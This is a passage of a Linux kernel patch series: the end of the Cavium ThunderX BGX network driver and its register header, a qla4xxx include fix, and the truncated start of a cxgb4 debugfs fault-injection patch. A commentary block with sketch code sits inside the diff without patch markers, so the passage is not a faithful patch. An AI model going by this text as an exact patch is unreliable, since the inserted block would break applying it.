lmacid = lmac->lmacid; + int lmac_type = bgx->lmac_type; + u64 cfg; + + bgx_reg_modify(bgx, lmacid, BGX_SPUX_MISC_CONTROL, SPU_MISC_CTL_RX_DIS); + if (bgx->use_training) { + cfg = bgx_reg_read(bgx, lmacid, BGX_SPUX_INT); + if (!(cfg & (1ull << 13))) { + cfg = (1ull << 13) | (1ull << 14); + bgx_reg_write(bgx, lmacid, BGX_SPUX_INT, cfg); + cfg = bgx_reg_read(bgx, lmacid, BGX_SPUX_BR_PMD_CRTL); + cfg |= (1ull << 0); + bgx_reg_write(bgx, lmacid, BGX_SPUX_BR_PMD_CRTL, cfg); + return -1; + } + } + + /* wait for PCS to come out of reset */ + if (bgx_poll_reg(bgx, lmacid, BGX_SPUX_CONTROL1, SPU_CTL_RESET, true)) { + dev_err(&bgx->pdev->dev, "BGX SPU reset not completed\n"); + return -1; + } + + if ((lmac_type == BGX_MODE_10G_KR) || (lmac_type == BGX_MODE_XFI) || + (lmac_type == BGX_MODE_40G_KR) || (lmac_type == BGX_MODE_XLAUI)) { + if (bgx_poll_reg(bgx, lmacid, BGX_SPUX_BR_STATUS1, + SPU_BR_STATUS_BLK_LOCK, false)) { + dev_err(&bgx->pdev->dev, + "SPU_BR_STATUS_BLK_LOCK not completed\n"); + return -1; + } + } else { + if (bgx_poll_reg(bgx, lmacid, BGX_SPUX_BX_STATUS, + SPU_BX_STATUS_RX_ALIGN, false)) { + dev_err(&bgx->pdev->dev, + "SPU_BX_STATUS_RX_ALIGN not completed\n"); + return -1; + } + } + + /* Clear rcvflt bit (latching high) and read it back */ + bgx_reg_modify(bgx, lmacid, BGX_SPUX_STATUS2, SPU_STATUS2_RCVFLT); + if (bgx_reg_read(bgx, lmacid, BGX_SPUX_STATUS2) & SPU_STATUS2_RCVFLT) { + dev_err(&bgx->pdev->dev, "Receive fault, retry training\n"); + if (bgx->use_training) { + cfg = bgx_reg_read(bgx, lmacid, BGX_SPUX_INT); + if (!(cfg & (1ull << 13))) { + cfg = (1ull << 13) | (1ull << 14); + bgx_reg_write(bgx, lmacid, BGX_SPUX_INT, cfg); + cfg = bgx_reg_read(bgx, lmacid, + BGX_SPUX_BR_PMD_CRTL); + cfg |= (1ull << 0); + bgx_reg_write(bgx, lmacid, + BGX_SPUX_BR_PMD_CRTL, cfg); + return -1; + } + } + return -1; + } + + /* Wait for MAC RX to be ready */ + if (bgx_poll_reg(bgx, lmacid, BGX_SMUX_RX_CTL, + SMU_RX_CTL_STATUS, true)) { + dev_err(&bgx->pdev->dev, "SMU RX link not okay\n"); + return -1; + } + + /* Wait for BGX RX to be idle */ + if (bgx_poll_reg(bgx, lmacid, BGX_SMUX_CTL, SMU_CTL_RX_IDLE, false)) { + dev_err(&bgx->pdev->dev, "SMU RX not idle\n"); + return -1; + } + + /* Wait for BGX TX to be idle */ + if (bgx_poll_reg(bgx, lmacid, BGX_SMUX_CTL, SMU_CTL_TX_IDLE, false)) { + dev_err(&bgx->pdev->dev, "SMU TX not idle\n"); + return -1; + } + + if (bgx_reg_read(bgx, lmacid, BGX_SPUX_STATUS2) & SPU_STATUS2_RCVFLT) { + dev_err(&bgx->pdev->dev, "Receive fault\n"); + return -1; + } + + /* Receive link is latching low. Force it high and verify it */ + bgx_reg_modify(bgx, lmacid, BGX_SPUX_STATUS1, SPU_STATUS1_RCV_LNK); + if (bgx_poll_reg(bgx, lmacid, BGX_SPUX_STATUS1, + SPU_STATUS1_RCV_LNK, false)) { + dev_err(&bgx->pdev->dev, "SPU receive link down\n"); + return -1; + } + + cfg = bgx_reg_read(bgx, lmacid, BGX_SPUX_MISC_CONTROL); + cfg &= ~SPU_MISC_CTL_RX_DIS; + bgx_reg_write(bgx, lmacid, BGX_SPUX_MISC_CONTROL, cfg); + return 0; +} + +static void bgx_poll_for_link(struct work_struct *work) +{ + struct lmac *lmac; + u64 link; + + lmac = container_of(work, struct lmac, dwork.work); + + /* Receive link is latching low. 
Force it high and verify it */ + bgx_reg_modify(lmac->bgx, lmac->lmacid, + BGX_SPUX_STATUS1, SPU_STATUS1_RCV_LNK); + bgx_poll_reg(lmac->bgx, lmac->lmacid, BGX_SPUX_STATUS1, + SPU_STATUS1_RCV_LNK, false); + + link = bgx_reg_read(lmac->bgx, lmac->lmacid, BGX_SPUX_STATUS1); + if (link & SPU_STATUS1_RCV_LNK) { + lmac->link_up = 1; + if (lmac->bgx->lmac_type == BGX_MODE_XLAUI) + lmac->last_speed = 40000; + else + lmac->last_speed = 10000; + lmac->last_duplex = 1; + } else { + lmac->link_up = 0; + } + + if (lmac->last_link != lmac->link_up) { + lmac->last_link = lmac->link_up; + if (lmac->link_up) + bgx_xaui_check_link(lmac); + } + + queue_delayed_work(lmac->check_link, &lmac->dwork, HZ * 2); +} + +static int bgx_lmac_enable(struct bgx *bgx, u8 lmacid) +{ + struct lmac *lmac; + u64 cfg; + + lmac = &bgx->lmac[lmacid]; + lmac->bgx = bgx; + + if (bgx->lmac_type == BGX_MODE_SGMII) { + lmac->is_sgmii = 1; + if (bgx_lmac_sgmii_init(bgx, lmacid)) + return -1; + } else { + lmac->is_sgmii = 0; + if (bgx_lmac_xaui_init(bgx, lmacid, bgx->lmac_type)) + return -1; + } + + if (lmac->is_sgmii) { + cfg = bgx_reg_read(bgx, lmacid, BGX_GMP_GMI_TXX_APPEND); + cfg |= ((1ull << 2) | (1ull << 1)); /* FCS and PAD */ + bgx_reg_modify(bgx, lmacid, BGX_GMP_GMI_TXX_APPEND, cfg); + bgx_reg_write(bgx, lmacid, BGX_GMP_GMI_TXX_MIN_PKT, 60 - 1); + } else { + cfg = bgx_reg_read(bgx, lmacid, BGX_SMUX_TX_APPEND); + cfg |= ((1ull << 2) | (1ull << 1)); /* FCS and PAD */ + bgx_reg_modify(bgx, lmacid, BGX_SMUX_TX_APPEND, cfg); + bgx_reg_write(bgx, lmacid, BGX_SMUX_TX_MIN_PKT, 60 + 4); + } + + /* Enable lmac */ + bgx_reg_modify(bgx, lmacid, BGX_CMRX_CFG, + CMR_EN | CMR_PKT_RX_EN | CMR_PKT_TX_EN); + + /* Restore default cfg, incase low level firmware changed it */ + bgx_reg_write(bgx, lmacid, BGX_CMRX_RX_DMAC_CTL, 0x03); + + if ((bgx->lmac_type != BGX_MODE_XFI) && + (bgx->lmac_type != BGX_MODE_XLAUI) && + (bgx->lmac_type != BGX_MODE_40G_KR) && + (bgx->lmac_type != BGX_MODE_10G_KR)) { + if (!lmac->phydev) + return -ENODEV; + + lmac->phydev->dev_flags = 0; + + if (phy_connect_direct(&lmac->netdev, lmac->phydev, + bgx_lmac_handler, + PHY_INTERFACE_MODE_SGMII)) + return -ENODEV; + + phy_start_aneg(lmac->phydev); + } else { + lmac->check_link = alloc_workqueue("check_link", WQ_UNBOUND | + WQ_MEM_RECLAIM, 1); + if (!lmac->check_link) + return -ENOMEM; + INIT_DELAYED_WORK(&lmac->dwork, bgx_poll_for_link); + queue_delayed_work(lmac->check_link, &lmac->dwork, 0); + } + + return 0; +} + +void bgx_lmac_disable(struct bgx *bgx, u8 lmacid) +{ + struct lmac *lmac; + u64 cmrx_cfg; + + lmac = &bgx->lmac[lmacid]; + if (lmac->check_link) { + /* Destroy work queue */ + cancel_delayed_work(&lmac->dwork); + flush_workqueue(lmac->check_link); + destroy_workqueue(lmac->check_link); + } + + cmrx_cfg = bgx_reg_read(bgx, lmacid, BGX_CMRX_CFG); + cmrx_cfg &= ~(1 << 15); + bgx_reg_write(bgx, lmacid, BGX_CMRX_CFG, cmrx_cfg); + bgx_flush_dmac_addrs(bgx, lmacid); + + if (lmac->phydev) + phy_disconnect(lmac->phydev); + + lmac->phydev = NULL; +} + +static void bgx_set_num_ports(struct bgx *bgx) +{ + u64 lmac_count; + + switch (bgx->qlm_mode) { + case QLM_MODE_SGMII: + bgx->lmac_count = 4; + bgx->lmac_type = BGX_MODE_SGMII; + bgx->lane_to_sds = 0; + break; + case QLM_MODE_XAUI_1X4: + bgx->lmac_count = 1; + bgx->lmac_type = BGX_MODE_XAUI; + bgx->lane_to_sds = 0xE4; + break; + case QLM_MODE_RXAUI_2X2: + bgx->lmac_count = 2; + bgx->lmac_type = BGX_MODE_RXAUI; + bgx->lane_to_sds = 0xE4; + break; + case QLM_MODE_XFI_4X1: + bgx->lmac_count = 4; + bgx->lmac_type = 
BGX_MODE_XFI; + bgx->lane_to_sds = 0; + break; + case QLM_MODE_XLAUI_1X4: + bgx->lmac_count = 1; + bgx->lmac_type = BGX_MODE_XLAUI; + bgx->lane_to_sds = 0xE4; + break; + case QLM_MODE_10G_KR_4X1: + bgx->lmac_count = 4; + bgx->lmac_type = BGX_MODE_10G_KR; + bgx->lane_to_sds = 0; + bgx->use_training = 1; + break; + case QLM_MODE_40G_KR4_1X4: + bgx->lmac_count = 1; + bgx->lmac_type = BGX_MODE_40G_KR; + bgx->lane_to_sds = 0xE4; + bgx->use_training = 1; + break; + default: + bgx->lmac_count = 0; + break; + } + + /* Check if low level firmware has programmed LMAC count + * based on board type, if yes consider that otherwise + * the default static values + */ + lmac_count = bgx_reg_read(bgx, 0, BGX_CMR_RX_LMACS) & 0x7; + if (lmac_count != 4) + bgx->lmac_count = lmac_count; +} + +static void bgx_init_hw(struct bgx *bgx) +{ + int i; + + bgx_set_num_ports(bgx); + + bgx_reg_modify(bgx, 0, BGX_CMR_GLOBAL_CFG, CMR_GLOBAL_CFG_FCS_STRIP); + if (bgx_reg_read(bgx, 0, BGX_CMR_BIST_STATUS)) + dev_err(&bgx->pdev->dev, "BGX%d BIST failed\n", bgx->bgx_id); + + /* Set lmac type and lane2serdes mapping */ + for (i = 0; i < bgx->lmac_count; i++) { + if (bgx->lmac_type == BGX_MODE_RXAUI) { + if (i) + bgx->lane_to_sds = 0x0e; + else + bgx->lane_to_sds = 0x04; + bgx_reg_write(bgx, i, BGX_CMRX_CFG, + (bgx->lmac_type << 8) | bgx->lane_to_sds); + continue; + } + bgx_reg_write(bgx, i, BGX_CMRX_CFG, + (bgx->lmac_type << 8) | (bgx->lane_to_sds + i)); + bgx->lmac[i].lmacid_bd = lmac_count; + lmac_count++; + } + + bgx_reg_write(bgx, 0, BGX_CMR_TX_LMACS, bgx->lmac_count); + bgx_reg_write(bgx, 0, BGX_CMR_RX_LMACS, bgx->lmac_count); + + /* Set the backpressure AND mask */ + for (i = 0; i < bgx->lmac_count; i++) + bgx_reg_modify(bgx, 0, BGX_CMR_CHAN_MSK_AND, + ((1ULL << MAX_BGX_CHANS_PER_LMAC) - 1) << + (i * MAX_BGX_CHANS_PER_LMAC)); + + /* Disable all MAC filtering */ + for (i = 0; i < RX_DMAC_COUNT; i++) + bgx_reg_write(bgx, 0, BGX_CMR_RX_DMACX_CAM + (i * 8), 0x00); + + /* Disable MAC steering (NCSI traffic) */ + for (i = 0; i < RX_TRAFFIC_STEER_RULE_COUNT; i++) + bgx_reg_write(bgx, 0, BGX_CMR_RX_STREERING + (i * 8), 0x00); +} + +static void bgx_get_qlm_mode(struct bgx *bgx) +{ + struct device *dev = &bgx->pdev->dev; + int lmac_type; + int train_en; + + /* Read LMAC0 type to figure out QLM mode + * This is configured by low level firmware + */ + lmac_type = bgx_reg_read(bgx, 0, BGX_CMRX_CFG); + lmac_type = (lmac_type >> 8) & 0x07; + + train_en = bgx_reg_read(bgx, 0, BGX_SPUX_BR_PMD_CRTL) & + SPU_PMD_CRTL_TRAIN_EN; + + switch (lmac_type) { + case BGX_MODE_SGMII: + bgx->qlm_mode = QLM_MODE_SGMII; + dev_info(dev, "BGX%d QLM mode: SGMII\n", bgx->bgx_id); + break; + case BGX_MODE_XAUI: + bgx->qlm_mode = QLM_MODE_XAUI_1X4; + dev_info(dev, "BGX%d QLM mode: XAUI\n", bgx->bgx_id); + break; + case BGX_MODE_RXAUI: + bgx->qlm_mode = QLM_MODE_RXAUI_2X2; + dev_info(dev, "BGX%d QLM mode: RXAUI\n", bgx->bgx_id); + break; + case BGX_MODE_XFI: + if (!train_en) { + bgx->qlm_mode = QLM_MODE_XFI_4X1; + dev_info(dev, "BGX%d QLM mode: XFI\n", bgx->bgx_id); + } else { + bgx->qlm_mode = QLM_MODE_10G_KR_4X1; + dev_info(dev, "BGX%d QLM mode: 10G_KR\n", bgx->bgx_id); + } + break; + case BGX_MODE_XLAUI: + if (!train_en) { + bgx->qlm_mode = QLM_MODE_XLAUI_1X4; + dev_info(dev, "BGX%d QLM mode: XLAUI\n", bgx->bgx_id); + } else { + bgx->qlm_mode = QLM_MODE_40G_KR4_1X4; + dev_info(dev, "BGX%d QLM mode: 40G_KR4\n", bgx->bgx_id); + } + break; + default: + bgx->qlm_mode = QLM_MODE_SGMII; + dev_info(dev, "BGX%d QLM default mode: SGMII\n", bgx->bgx_id); + } +} + 
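The QLM mode detection above reduces to two register fields: the LMAC type in bits 10:8 of BGX_CMRX_CFG and the link-training enable bit of BGX_SPUX_BR_PMD_CRTL. A minimal stand-alone sketch of that decision is shown below; it only mirrors the switch in bgx_get_qlm_mode() under the assumption that the two raw register values have already been read elsewhere, and it uses its own placeholder enum rather than the driver's types.

/* Illustrative sketch only: mirrors the lmac_type -> qlm_mode decision in
 * bgx_get_qlm_mode() above.  The register values are assumed to have been
 * read by some other means; nothing here touches hardware.
 */
enum qlm_mode_sketch {
        SKETCH_SGMII, SKETCH_XAUI_1X4, SKETCH_RXAUI_2X2, SKETCH_XFI_4X1,
        SKETCH_XLAUI_1X4, SKETCH_10G_KR_4X1, SKETCH_40G_KR4_1X4,
};

static enum qlm_mode_sketch decode_qlm_mode(unsigned long long cmrx_cfg,
                                            unsigned long long pmd_ctl)
{
        int lmac_type = (cmrx_cfg >> 8) & 0x07;   /* CMRX_CFG LMAC type, bits 10:8 */
        int train_en  = pmd_ctl & (1ull << 1);    /* SPU_PMD_CRTL_TRAIN_EN */

        switch (lmac_type) {
        case 0: return SKETCH_SGMII;                                   /* BGX_MODE_SGMII */
        case 1: return SKETCH_XAUI_1X4;                                /* BGX_MODE_XAUI  */
        case 2: return SKETCH_RXAUI_2X2;                               /* BGX_MODE_RXAUI */
        case 3: return train_en ? SKETCH_10G_KR_4X1 : SKETCH_XFI_4X1;  /* XFI vs 10G-KR  */
        case 4: return train_en ? SKETCH_40G_KR4_1X4 : SKETCH_XLAUI_1X4; /* XLAUI vs 40G-KR4 */
        default: return SKETCH_SGMII;                                  /* fall back to SGMII */
        }
}

In other words, the same serdes configuration (XFI/XLAUI) is reinterpreted as a backplane KR mode purely on the strength of the firmware-programmed training-enable bit.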
+static void bgx_init_of(struct bgx *bgx, struct device_node *np) +{ + struct device_node *np_child; + u8 lmac = 0; + + for_each_child_of_node(np, np_child) { + struct device_node *phy_np; + const char *mac; + + phy_np = of_parse_phandle(np_child, "phy-handle", 0); + if (phy_np) + bgx->lmac[lmac].phydev = of_phy_find_device(phy_np); + + mac = of_get_mac_address(np_child); + if (mac) + ether_addr_copy(bgx->lmac[lmac].mac, mac); + + SET_NETDEV_DEV(&bgx->lmac[lmac].netdev, &bgx->pdev->dev); + bgx->lmac[lmac].lmacid = lmac; + lmac++; + if (lmac == MAX_LMAC_PER_BGX) + break; + } +} + +static int bgx_probe(struct pci_dev *pdev, const struct pci_device_id *ent) +{ + int err; + struct device *dev = &pdev->dev; + struct bgx *bgx = NULL; + struct device_node *np; + char bgx_sel[5]; + u8 lmac; + + bgx = devm_kzalloc(dev, sizeof(*bgx), GFP_KERNEL); + if (!bgx) + return -ENOMEM; + bgx->pdev = pdev; + + pci_set_drvdata(pdev, bgx); + + err = pci_enable_device(pdev); + if (err) { + dev_err(dev, "Failed to enable PCI device\n"); + pci_set_drvdata(pdev, NULL); + return err; + } + + err = pci_request_regions(pdev, DRV_NAME); + if (err) { + dev_err(dev, "PCI request regions failed 0x%x\n", err); + goto err_disable_device; + } + + /* MAP configuration registers */ + bgx->reg_base = pcim_iomap(pdev, PCI_CFG_REG_BAR_NUM, 0); + if (!bgx->reg_base) { + dev_err(dev, "BGX: Cannot map CSR memory space, aborting\n"); + err = -ENOMEM; + goto err_release_regions; + } + bgx->bgx_id = (pci_resource_start(pdev, PCI_CFG_REG_BAR_NUM) >> 24) & 1; + bgx->bgx_id += NODE_ID(pci_resource_start(pdev, PCI_CFG_REG_BAR_NUM)) + * MAX_BGX_PER_CN88XX; + bgx_vnic[bgx->bgx_id] = bgx; + bgx_get_qlm_mode(bgx); + + snprintf(bgx_sel, 5, "bgx%d", bgx->bgx_id); + np = of_find_node_by_name(NULL, bgx_sel); + if (np) + bgx_init_of(bgx, np); + + bgx_init_hw(bgx); + + /* Enable all LMACs */ + for (lmac = 0; lmac < bgx->lmac_count; lmac++) { + err = bgx_lmac_enable(bgx, lmac); + if (err) { + dev_err(dev, "BGX%d failed to enable lmac%d\n", + bgx->bgx_id, lmac); + goto err_enable; + } + } + + return 0; + +err_enable: + bgx_vnic[bgx->bgx_id] = NULL; +err_release_regions: + pci_release_regions(pdev); +err_disable_device: + pci_disable_device(pdev); + pci_set_drvdata(pdev, NULL); + return err; +} + +static void bgx_remove(struct pci_dev *pdev) +{ + struct bgx *bgx = pci_get_drvdata(pdev); + u8 lmac; + + /* Disable all LMACs */ + for (lmac = 0; lmac < bgx->lmac_count; lmac++) + bgx_lmac_disable(bgx, lmac); + + bgx_vnic[bgx->bgx_id] = NULL; + pci_release_regions(pdev); + pci_disable_device(pdev); + pci_set_drvdata(pdev, NULL); +} + +static struct pci_driver bgx_driver = { + .name = DRV_NAME, + .id_table = bgx_id_table, + .probe = bgx_probe, + .remove = bgx_remove, +}; + +static int __init bgx_init_module(void) +{ + pr_info("%s, ver %s\n", DRV_NAME, DRV_VERSION); + + return pci_register_driver(&bgx_driver); +} + +static void __exit bgx_cleanup_module(void) +{ + pci_unregister_driver(&bgx_driver); +} + +module_init(bgx_init_module); +module_exit(bgx_cleanup_module); diff --git a/drivers/net/ethernet/cavium/thunder/thunder_bgx.h b/drivers/net/ethernet/cavium/thunder/thunder_bgx.h new file mode 100644 index 000000000000..9d91ce44f8d7 --- /dev/null +++ b/drivers/net/ethernet/cavium/thunder/thunder_bgx.h @@ -0,0 +1,223 @@ +/* + * Copyright (C) 2015 Cavium, Inc. + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of version 2 of the GNU General Public License + * as published by the Free Software Foundation. 
+ */ + +#ifndef THUNDER_BGX_H +#define THUNDER_BGX_H + +#define MAX_BGX_THUNDER 8 /* Max 4 nodes, 2 per node */ +#define MAX_BGX_PER_CN88XX 2 +#define MAX_LMAC_PER_BGX 4 +#define MAX_BGX_CHANS_PER_LMAC 16 +#define MAX_DMAC_PER_LMAC 8 +#define MAX_FRAME_SIZE 9216 + +#define MAX_DMAC_PER_LMAC_TNS_BYPASS_MODE 2 + +#define MAX_LMAC (MAX_BGX_PER_CN88XX * MAX_LMAC_PER_BGX) + +#define NODE_ID_MASK 0x300000000000 +#define NODE_ID(x) ((x & NODE_ID_MASK) >> 44) + +/* Registers */ +#define BGX_CMRX_CFG 0x00 +#define CMR_PKT_TX_EN BIT_ULL(13) +#define CMR_PKT_RX_EN BIT_ULL(14) +#define CMR_EN BIT_ULL(15) +#define BGX_CMR_GLOBAL_CFG 0x08 +#define CMR_GLOBAL_CFG_FCS_STRIP BIT_ULL(6) +#define BGX_CMRX_RX_ID_MAP 0x60 +#define BGX_CMRX_RX_STAT0 0x70 +#define BGX_CMRX_RX_STAT1 0x78 +#define BGX_CMRX_RX_STAT2 0x80 +#define BGX_CMRX_RX_STAT3 0x88 +#define BGX_CMRX_RX_STAT4 0x90 +#define BGX_CMRX_RX_STAT5 0x98 +#define BGX_CMRX_RX_STAT6 0xA0 +#define BGX_CMRX_RX_STAT7 0xA8 +#define BGX_CMRX_RX_STAT8 0xB0 +#define BGX_CMRX_RX_STAT9 0xB8 +#define BGX_CMRX_RX_STAT10 0xC0 +#define BGX_CMRX_RX_BP_DROP 0xC8 +#define BGX_CMRX_RX_DMAC_CTL 0x0E8 +#define BGX_CMR_RX_DMACX_CAM 0x200 +#define RX_DMACX_CAM_EN BIT_ULL(48) +#define RX_DMACX_CAM_LMACID(x) (x << 49) +#define RX_DMAC_COUNT 32 +#define BGX_CMR_RX_STREERING 0x300 +#define RX_TRAFFIC_STEER_RULE_COUNT 8 +#define BGX_CMR_CHAN_MSK_AND 0x450 +#define BGX_CMR_BIST_STATUS 0x460 +#define BGX_CMR_RX_LMACS 0x468 +#define BGX_CMRX_TX_STAT0 0x600 +#define BGX_CMRX_TX_STAT1 0x608 +#define BGX_CMRX_TX_STAT2 0x610 +#define BGX_CMRX_TX_STAT3 0x618 +#define BGX_CMRX_TX_STAT4 0x620 +#define BGX_CMRX_TX_STAT5 0x628 +#define BGX_CMRX_TX_STAT6 0x630 +#define BGX_CMRX_TX_STAT7 0x638 +#define BGX_CMRX_TX_STAT8 0x640 +#define BGX_CMRX_TX_STAT9 0x648 +#define BGX_CMRX_TX_STAT10 0x650 +#define BGX_CMRX_TX_STAT11 0x658 +#define BGX_CMRX_TX_STAT12 0x660 +#define BGX_CMRX_TX_STAT13 0x668 +#define BGX_CMRX_TX_STAT14 0x670 +#define BGX_CMRX_TX_STAT15 0x678 +#define BGX_CMRX_TX_STAT16 0x680 +#define BGX_CMRX_TX_STAT17 0x688 +#define BGX_CMR_TX_LMACS 0x1000 + +#define BGX_SPUX_CONTROL1 0x10000 +#define SPU_CTL_LOW_POWER BIT_ULL(11) +#define SPU_CTL_RESET BIT_ULL(15) +#define BGX_SPUX_STATUS1 0x10008 +#define SPU_STATUS1_RCV_LNK BIT_ULL(2) +#define BGX_SPUX_STATUS2 0x10020 +#define SPU_STATUS2_RCVFLT BIT_ULL(10) +#define BGX_SPUX_BX_STATUS 0x10028 +#define SPU_BX_STATUS_RX_ALIGN BIT_ULL(12) +#define BGX_SPUX_BR_STATUS1 0x10030 +#define SPU_BR_STATUS_BLK_LOCK BIT_ULL(0) +#define SPU_BR_STATUS_RCV_LNK BIT_ULL(12) +#define BGX_SPUX_BR_PMD_CRTL 0x10068 +#define SPU_PMD_CRTL_TRAIN_EN BIT_ULL(1) +#define BGX_SPUX_BR_PMD_LP_CUP 0x10078 +#define BGX_SPUX_BR_PMD_LD_CUP 0x10088 +#define BGX_SPUX_BR_PMD_LD_REP 0x10090 +#define BGX_SPUX_FEC_CONTROL 0x100A0 +#define SPU_FEC_CTL_FEC_EN BIT_ULL(0) +#define SPU_FEC_CTL_ERR_EN BIT_ULL(1) +#define BGX_SPUX_AN_CONTROL 0x100C8 +#define SPU_AN_CTL_AN_EN BIT_ULL(12) +#define SPU_AN_CTL_XNP_EN BIT_ULL(13) +#define BGX_SPUX_AN_ADV 0x100D8 +#define BGX_SPUX_MISC_CONTROL 0x10218 +#define SPU_MISC_CTL_INTLV_RDISP BIT_ULL(10) +#define SPU_MISC_CTL_RX_DIS BIT_ULL(12) +#define BGX_SPUX_INT 0x10220 /* +(0..3) << 20 */ +#define BGX_SPUX_INT_W1S 0x10228 +#define BGX_SPUX_INT_ENA_W1C 0x10230 +#define BGX_SPUX_INT_ENA_W1S 0x10238 +#define BGX_SPU_DBG_CONTROL 0x10300 +#define SPU_DBG_CTL_AN_ARB_LINK_CHK_EN BIT_ULL(18) +#define SPU_DBG_CTL_AN_NONCE_MCT_DIS BIT_ULL(29) + +#define BGX_SMUX_RX_INT 0x20000 +#define BGX_SMUX_RX_JABBER 0x20030 +#define BGX_SMUX_RX_CTL 0x20048 +#define 
SMU_RX_CTL_STATUS (3ull << 0) +#define BGX_SMUX_TX_APPEND 0x20100 +#define SMU_TX_APPEND_FCS_D BIT_ULL(2) +#define BGX_SMUX_TX_MIN_PKT 0x20118 +#define BGX_SMUX_TX_INT 0x20140 +#define BGX_SMUX_TX_CTL 0x20178 +#define SMU_TX_CTL_DIC_EN BIT_ULL(0) +#define SMU_TX_CTL_UNI_EN BIT_ULL(1) +#define SMU_TX_CTL_LNK_STATUS (3ull << 4) +#define BGX_SMUX_TX_THRESH 0x20180 +#define BGX_SMUX_CTL 0x20200 +#define SMU_CTL_RX_IDLE BIT_ULL(0) +#define SMU_CTL_TX_IDLE BIT_ULL(1) + +#define BGX_GMP_PCS_MRX_CTL 0x30000 +#define PCS_MRX_CTL_RST_AN BIT_ULL(9) +#define PCS_MRX_CTL_PWR_DN BIT_ULL(11) +#define PCS_MRX_CTL_AN_EN BIT_ULL(12) +#define PCS_MRX_CTL_RESET BIT_ULL(15) +#define BGX_GMP_PCS_MRX_STATUS 0x30008 +#define PCS_MRX_STATUS_AN_CPT BIT_ULL(5) +#define BGX_GMP_PCS_ANX_AN_RESULTS 0x30020 +#define BGX_GMP_PCS_SGM_AN_ADV 0x30068 +#define BGX_GMP_PCS_MISCX_CTL 0x30078 +#define PCS_MISC_CTL_GMX_ENO BIT_ULL(11) +#define PCS_MISC_CTL_SAMP_PT_MASK 0x7Full +#define BGX_GMP_GMI_PRTX_CFG 0x38020 +#define GMI_PORT_CFG_SPEED BIT_ULL(1) +#define GMI_PORT_CFG_DUPLEX BIT_ULL(2) +#define GMI_PORT_CFG_SLOT_TIME BIT_ULL(3) +#define GMI_PORT_CFG_SPEED_MSB BIT_ULL(8) +#define BGX_GMP_GMI_RXX_JABBER 0x38038 +#define BGX_GMP_GMI_TXX_THRESH 0x38210 +#define BGX_GMP_GMI_TXX_APPEND 0x38218 +#define BGX_GMP_GMI_TXX_SLOT 0x38220 +#define BGX_GMP_GMI_TXX_BURST 0x38228 +#define BGX_GMP_GMI_TXX_MIN_PKT 0x38240 +#define BGX_GMP_GMI_TXX_SGMII_CTL 0x38300 + +#define BGX_MSIX_VEC_0_29_ADDR 0x400000 /* +(0..29) << 4 */ +#define BGX_MSIX_VEC_0_29_CTL 0x400008 +#define BGX_MSIX_PBA_0 0x4F0000 + +/* MSI-X interrupts */ +#define BGX_MSIX_VECTORS 30 +#define BGX_LMAC_VEC_OFFSET 7 +#define BGX_MSIX_VEC_SHIFT 4 + +#define CMRX_INT 0 +#define SPUX_INT 1 +#define SMUX_RX_INT 2 +#define SMUX_TX_INT 3 +#define GMPX_PCS_INT 4 +#define GMPX_GMI_RX_INT 5 +#define GMPX_GMI_TX_INT 6 +#define CMR_MEM_INT 28 +#define SPU_MEM_INT 29 + +#define LMAC_INTR_LINK_UP BIT(0) +#define LMAC_INTR_LINK_DOWN BIT(1) + +/* RX_DMAC_CTL configuration*/ +enum MCAST_MODE { + MCAST_MODE_REJECT, + MCAST_MODE_ACCEPT, + MCAST_MODE_CAM_FILTER, + RSVD +}; + +#define BCAST_ACCEPT 1 +#define CAM_ACCEPT 1 + +void bgx_add_dmac_addr(u64 dmac, int node, int bgx_idx, int lmac); +unsigned bgx_get_map(int node); +int bgx_get_lmac_count(int node, int bgx); +const char *bgx_get_lmac_mac(int node, int bgx_idx, int lmacid); +void bgx_set_lmac_mac(int node, int bgx_idx, int lmacid, const char *mac); +void bgx_get_lmac_link_state(int node, int bgx_idx, int lmacid, void *status); +u64 bgx_get_rx_stats(int node, int bgx_idx, int lmac, int idx); +u64 bgx_get_tx_stats(int node, int bgx_idx, int lmac, int idx); +#define BGX_RX_STATS_COUNT 11 +#define BGX_TX_STATS_COUNT 18 + +struct bgx_stats { + u64 rx_stats[BGX_RX_STATS_COUNT]; + u64 tx_stats[BGX_TX_STATS_COUNT]; +}; + +enum LMAC_TYPE { + BGX_MODE_SGMII = 0, /* 1 lane, 1.250 Gbaud */ + BGX_MODE_XAUI = 1, /* 4 lanes, 3.125 Gbaud */ + BGX_MODE_DXAUI = 1, /* 4 lanes, 6.250 Gbaud */ + BGX_MODE_RXAUI = 2, /* 2 lanes, 6.250 Gbaud */ + BGX_MODE_XFI = 3, /* 1 lane, 10.3125 Gbaud */ + BGX_MODE_XLAUI = 4, /* 4 lanes, 10.3125 Gbaud */ + BGX_MODE_10G_KR = 3,/* 1 lane, 10.3125 Gbaud */ + BGX_MODE_40G_KR = 4,/* 4 lanes, 10.3125 Gbaud */ +}; + +enum qlm_mode { + QLM_MODE_SGMII, /* SGMII, each lane independent */ + QLM_MODE_XAUI_1X4, /* 1 XAUI or DXAUI, 4 lanes */ + QLM_MODE_RXAUI_2X2, /* 2 RXAUI, 2 lanes each */ + QLM_MODE_XFI_4X1, /* 4 XFI, 1 lane each */ + QLM_MODE_XLAUI_1X4, /* 1 XLAUI, 4 lanes each */ + QLM_MODE_10G_KR_4X1, /* 4 10GBASE-KR, 1 lane each */ 
+ QLM_MODE_40G_KR4_1X4, /* 1 40GBASE-KR4, 4 lanes each */ +}; + +#endif /* THUNDER_BGX_H */ From c6bfda8d72c485b2eee1642cbcbd92e3fbb93ed3 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Tue, 26 May 2015 21:43:44 -0700 Subject: [PATCH 319/872] qla4xxx: add a missing include vmalloc.h used to be included from include/net/inet_hashtables.h but it is no longer the case. Fixes: 095dc8e0c368 ("tcp: fix/cleanup inet_ehash_locks_alloc()") Reported-by: kbuild test robot Signed-off-by: Eric Dumazet Signed-off-by: David S. Miller --- drivers/scsi/qla4xxx/ql4_def.h | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/scsi/qla4xxx/ql4_def.h b/drivers/scsi/qla4xxx/ql4_def.h index 8f6d0fb2cd80..a7cfc270bd08 100644 --- a/drivers/scsi/qla4xxx/ql4_def.h +++ b/drivers/scsi/qla4xxx/ql4_def.h @@ -26,6 +26,7 @@ #include #include #include +#include #include #include From 5b377d114f2b9ceed97ed84ef32d2afededfcc31 Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Wed, 27 May 2015 22:30:23 +0530 Subject: [PATCH 320/872] cxgb4: Add debugfs facility to inject FL starvation Add debugfs entry to inject Freelist starvation, used only for 